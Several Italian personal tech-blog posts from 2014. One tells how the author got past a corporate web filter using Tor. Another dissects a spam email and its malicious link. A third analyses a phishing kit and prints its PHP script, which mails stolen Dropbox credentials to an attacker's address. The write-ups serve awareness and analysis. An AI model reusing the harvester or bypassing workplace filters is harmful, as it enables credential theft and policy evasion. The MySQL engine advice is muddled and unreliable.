martedì 16 dicembre 2014

Evadere da un proxy server (3)

Questo post e' la continuazione dei due precedenti post (1 e 2)


il mio proxy server aziendale, oltre ad effettuare il vero e proprio lavoro di proxy, effettua anche una scansione dei contenuti ed evita la navigazione su una serie di siti che considera non adatti ad un ambiente lavorativo (ancora devo scoprire il motivo perche' fa passare Facebook ma lasciamo perdere......)

Il problema e' che nella rete del blocco del filtro cascano siti legittimi e legati all'attivita' lavorativa come per esempio il sito dell'Ordine dei Geologi della Toscana (viene classificato come Disease Vector anche se non e' vero)




Ho scoperto quasi per caso che il proxy server puo' essere attraversato dalle connessioni su reti TOR. Utilizzando il Tor Browser Bundle (configurato per utilizzare il proxy aziendale) si puo' raggiungere tranquillamente il sito filtrato (nella foto sopra si puo' osservare la pagina di Chrome con sovrapposta Firefox tramite TOR) visto che tutto il contenuto della connessione e' criptato e quindi non puo' essere analizzato

Quindi ancora una volta e' stato possibile evadere dal proxy, con mezzi peraltro banali

lunedì 15 dicembre 2014

Google CardBoard

In vena di sperimentazione mi sono comprato la Google CardBoard
Si tratta di un esperimento presentato da Google per convertire un comune telefono (vedremo poi non poi cosi' comune) in un visore tridimensionale (come Oculus Rift) dal basso costo

Il kit puo' essere autoprodotto con del cartone (Google fornisce le istruzioni) ma non e' cosi' semplice perche' servono due lentine di una lunghezza focale ben determinata. Il kit ufficiale si trova sui 25 euro ma ho trovato su TinyDeal una offerta ad un paio di euro (spese di spedizione comprese, basta saper aspettare)



Come si vede il kit non e' gran che come precisione ed sono dovuto ricorrere al nastro adesivo per tenere tutto insieme. Il telefono deve essere inserito all'interno dell'alloggiamento (ATTENZIONE!!! puo' scivolare lateralmente quindi puo' cadere durante l'uso e' trattenuto dalle mani ma in altri casi no)
Come si vede dalla foto lo schermo del telefono viene diviso in due settori (uno per ogni occhio) per la visione stereoscopica


questo e' l'aspetto montato
Primo avviso: essendo fatto di cartone ed appoggiandosi sulla fronte, inevitabilmente il sudore della fronte sporca la parte interna (vedi foto sottostante) anche dopo un solo utilizzo


Secondo avviso: non tutti i telefoni sono adatti. Google certifica come funzionanti Nexus 5, Nexus 4 (alcuni utenti lamentano che non funziona perfettamente) e pochi altri. Sul mio Moto G 2013 l'esperienza 3D e' ottima ma NON funziona la funzione click con il magnete (posto sulla sinistra del visore) ed e' necessario avere un telefono con giroscopi (per esempio nei demo si deve inclinare il visore per scorrere a destra e sinistra e sul Moto G 2013 non funziona)

Terzo avviso: il visore puo' funzionare anche con IPhone. Ho provato con le applicazioni 3D compatibili con il 4S ma lo schermo e' decisamente troppo piccolo. Probabilmente si deve utilizzare IPhone 5

Oltre alle applicazioni su PlayStore sono molto carine le applicazioni 3D che si trovano su Chrome Experiment

martedì 9 dicembre 2014

Spam da Libero.it

Frugando nella cartella spam di GMail (non lo faccio spesso ma ogni tanto controllo di non aver perso qualcosa) ho trovato una mail di mia zia ....curioso che GMail sbagli cosi' a classificare le mail.

Aprendo la mail ho trovato solo un link (http://expressbookng.com/oikmco/oyurogwunaehhaadlwohrwyurbap.pvtqyqdnpilaulwse=
hm) il quale una volta cliccato rimandava a questo sito (http://mother-blog-home.com/)...ovviamente queste cose si fanno su macchine virtuali usa e getta...mia zia non puo' mandare queste mail ;>
(peraltro la prima volta che ho contattato il sito questo non era raggiungibile, il giorno successivo era invece presente)

ok guardiamo meglio
aprendo gli header del messaggio e' chiaro perche' Google lo ha messo in spam ..l'ip dichiarato dal mittente non corrisponde al server di posta di libero.it

andiamo avanti
il server di posta mittente (cne.gob.ve) e' relativo ad un sito istituzionale venezuelano per le elezioni elettorali (non libero) 
Il messaggio e' stato inoltrato da un client Microsoft ( questo non e' discriminante perche' da Libero si puo' scrivere sia webmail che tramite client di posta sul proprio Pc)

Contattata mia zia mi ha detto che il suo account era stato usato per inviare mail a tutti i suoi contatti 
Il problema era quindi nel portatile ??? Sembra di no perche' non si spiegherebbe l'utilizzo di un mail server venezuelano

Andando un po' a giro (per esempio qui) sembra che il problema sia una compromissione dei server di Libero.it...cambiare password dell'account sembra sostanzialmente inutile, forse e' meglio cambiare servizio di posta


----------------------------------------------------------------------------------                                                                                                                                                                                                                                                                
Delivered-To: xxxxxx@gmail.com
Received: by 10.216.40.6 with SMTP id e6csp81601web;
        Sat, 29 Nov 2014 14:40:43 -0800 (PST)
X-Received: by 10.42.4.201 with SMTP id 9mr1318337ict.23.1417300842579;
        Sat, 29 Nov 2014 14:40:42 -0800 (PST)
Return-Path: <xxxxxxxx@libero.it>
Received: from mail.cne.gob.ve (mail.cne.gob.ve. [190.202.82.22])
        by mx.google.com with SMTP id 9si9731310ica.66.2014.11.29.14.40.41
        for <xxxxxxxx@gmail.com>;
        Sat, 29 Nov 2014 14:40:42 -0800 (PST)
Received-SPF: fail (google.com: domain of xxxxxxx@libero.it does not designate 190.202.82.22 as permitted sender) client-ip=190.202.82.22;
Authentication-Results: mx.google.com;
       spf=fail (google.com: domain of xxxxxxxx@libero.it does not designate 190.202.82.22 as permitted sender) smtp.mail=xxxxxxx@libero.it
Received: from localhost (correo-2 [127.0.0.1])
by mail.cne.gob.ve (Postfix) with ESMTP id 681C74BED69
for <xxxxxxx@gmail.com>; Sat, 29 Nov 2014 22:34:42 +0000 (UTC)
X-Virus-Scanned: amavisd-new at cne.gob.ve
Received: from mail.cne.gob.ve ([127.0.0.1])
by localhost (correo-2.cne [127.0.0.1]) (amavisd-new, port 10024)
with ESMTP id PEa1gr_ZJWyY for <xxxxxxxxx@gmail.com>;
Sat, 29 Nov 2014 18:04:41 -0430 (VET)
Received: from mail.cne.gob.ve (67-32-134-95.pool.ukrtel.net [95.134.32.67])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(No client certificate requested)
by mail.cne.gob.ve (Postfix) with ESMTPSA id 1E4DE4BED3E
for <xxxxxxx@gmail.com>; Sat, 29 Nov 2014 18:04:39 -0430 (VET)
Authentication-Results: mail.cne.gob.ve; dkim=none reason="no signature";
dkim-adsp=none
Message-ID: <A4D9D0CA95F0A58CD5E10C49A47C1750@mail.cne.gob.ve>
From: "xxxxxxxx" <xxxxxxx@libero.it>
To: "xxxxxx" <xxxxxxx@gmail.com>
Subject: =?ISO-8859-1?Q?FW=3Amwmachado?=
Date: Fri, 29 Nov 2014 11:34:39 +0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
 boundary="----=_NextPart_000_AFA7_0F92A445.54BC485A"
X-Priority: 3
X-MSMail-Priority: Normal
Importance: Normal
X-Mailer: Microsoft Windows Live Mail 16.4.3522.110
X-MIMEOLE: Produced By Microsoft MimeOLE V16.4.3522.110

This is a multi-part message in MIME format.

------=_NextPart_000_AFA7_0F92A445.54BC485A
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

http://expressbookng.com/oikmco/oyurogwunaehhaadlwohrwyurbap.pvtqyqdnpilaulwse=
hm 

 xxxxxxx@libero.it 


------=_NextPart_000_AFA7_0F92A445.54BC485A
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: quoted-printable

=EF=BB=BF<HTML><HEAD><META http-equiv=3D"content-type" content: text/html;=
 charset=3DUTF-8></HEAD><BODY><a href=
=3D"http://expressbookng.com/oikmco/oyurogwunaehhaadlwohrwyurbap.pvtqyqdnpilau=
lwsehm">http://expressbookng.com/oikmco/oyurogwunaehhaadlwohrwyurbap.pvtqyqdnp=
ilaulwsehm</a>=
 <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>=
 xxxxxxxx@libero.it <br><br> </BODY></HTML>

------=_NextPart_000_AFA7_0F92A445.54BC485A--

domenica 7 dicembre 2014

Nuove frontiere del Phishing : GDOCS

Oggi mi e' arrivata una mail da una persona che non conosco di persona e che mi aveva condiviso un file su GDocs


da una breve ricerca ho visto che questa persona e' collegata ad un gruppo sui Genesis su Facebook a cui sono iscritto e quindi ho cliccato sul link
Mi si e' aperta questa finestra

Dropbox ??? Che storia e' mai questa ??? Non era GDocs??
E poi guardo la Url ?? non corrisponde a server di Dropbox ma ad un servizio spagnolo (non capisco bene lo spagnolo ma non e' un servizio cloud di file sharing
Provo allora ad andare indietro di una directory su http://surynorte.cl/lee/ ed ecco la gradita sorpresa

Una directory di cui si puo' fare il listing con un file drop.zip troppo invitante per non cliccarci sopra. Lo scarico in locale e questa e' la struttura


il tempo si aprire il file submit.php ed ecco il contenuto
-----------------------------------
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$time = date("m-d-Y g:i:a");
$msg = "---------------------------------------------------------------------------\n";
$msg .= "Dropbox Login Info by Abbeymilli\n";
$msg .= "---------------------------------------------------------------------------\n";
$msg .= "Email : ".$_POST['username']."\n";
$msg .= "Password : ".$_POST['password']."\n";
$msg .= "---------------------------------------------------------------------------\n";
$msg .= "Sent from $ip on $time\n";
$msg .= "---------------------------------------------------------------------------\n";
$to = "kelvinpeter270@gmail.com,kelvinpeter270@gmail.com";
$subject = "Chi Lee Update $ip";
$from = "From: Dropbox<newsupdate@servisdropbox.com>";
mail($to,$subject,$msg,$from);
header("Location: http://www.dropbox.com");
?>
-----------------------------------

in pratica lo script invia le credenziali richieste (username e password) ad una mail. Un vero e proprio phishing (seppure un po' dilettantesco)

A chi lo segnalo questo abuso adesso?????

a proposito: chiunque tu sia signor kelvinpeter270@gmail.com, a questo giro non mi hai preso ;>



venerdì 5 dicembre 2014

Estimote Virtual Beacon


Nell'applicazione Estimote per cellulari e' disponibile anche la funzione Virtual Beacon
Il problema e' che, usando gli esempi di Estimote, si riescono a visualizzare i beacon fisici e non il virtual beacon




il problema risiede nel fatto che i beacon fisici Estimote hanno un uuid B9407F30-F5F8-466E-AFF9-25556B57FE6D mentre i virtual beacon hanno un uuid 8492E75F-4FD6-469D-B132-043FE94921D8

Modificando questo parametro e' possibile usare i virtual beacon per gli esempi di Estimote


MYIsam vs InnoDB

Recentemente e' stato deciso un aggiornamento di un server interno basato su una vetusta Ubuntu 10.10 per passare ad una macchina e ad una distribuzione piu' recente
Nella migrazione un applicativo proprietario (per altro scritto in Java) basato su MySql ha iniziato a dare improvvisamente problemi con una lentezza delle query (con tempi di risposta aumentati da 10 a 100 volte)

Dopo un  po' di navigazione a vuoto per fortuna lo sviluppatore ha fornito l'indicazione corretta
bisogna impostare il motore dati di Mysql da InnoDB a MyIsam

con il tempo (e piu' precisamente da Ubuntu 12.04) le tabelle di default sono passate da InnoDB a MyIsam
In generale riprendendo dal sito MySql le MyIsam sono piu' performanti nelle SELECT (l'applicativo in uso nel server invece effettua circa 40 INSERT al secondo e solo sporadiche select)

per vedere il tipo di motore associato ad una tabella si puo' usare la seguente query

SELECT TABLE_NAME, ENGINE FROM information_schema.TABLES where TABLE_SCHEMA = 'xxxxxxx';
Per convertire una tabella di InnoDB a MyIsam si puo' usare invece il comando

ALTER TABLE tablename ENGINE=MYISAM;


Una volta effettuata la modifica il programma e' ritornato a lavorare in modo corretto

Un altro aspetto non trascurabile di differenze tra InnoDB e MyIsam e' che le InnoDB di fatto non sono corruttibili. Se con MYIsam era necessario il comando

mysqlcheck --repair --all-databases -u root -p

adesso in caso di uso InnoDB si mostra l'avviso "The storage engine for the table doesn't support repair"


giovedì 4 dicembre 2014

SSH su TIM Mobile

Dopo un po' di tempo che non amministravo server Linux mi sono ritrovato con nuove macchine da gestire. Dato che sono sempre a giro oramai mi connetto quasi sempre via cellulare. Usando una scheda TIM per una connessione SSH mi sono spesso trovato disconnesso dopo pochi secondi (questo difetto e' sostanzialmente indipendente dall'hardware usato)



dopo un po' di ricerche su Internet ho trovato che questo malfunzionamento era segnalato da tempo su ADSL Telecom e la soluzione suggerita era di aggiungere il parametro ServerAliasInterval come segue

ssh user@host -o ServerAliveInterval=15

l'indicazione e' risultata valida anche per le connessioni mobile per cui adesso riesco ad usare SSH con TIM senza disconnessioni